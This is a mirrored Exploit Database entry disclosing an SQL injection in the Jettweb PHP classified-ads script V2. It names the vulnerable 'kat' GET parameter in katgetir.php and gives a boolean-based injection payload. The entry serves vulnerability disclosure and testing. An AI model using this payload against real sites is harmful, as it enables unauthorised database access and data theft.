Jettweb Php Hazır İlan Sitesi Scripti V2 – SQL Injection

• Exploit Database
• 121 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46606/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  # Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection # Date: 25.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html # Demo Site: http://ilanv2.proemlaksitesi.net # Version: V2 # Tested on: Kali Linux # CVE: N/A   ----- PoC : SQLi -----   Request: http://localhost/[PATH]/m/katgetir.php?kat=1 Vulnerable Parameter: kat (GET) Payload: kat=1' OR NOT 1300=1300-- rwTf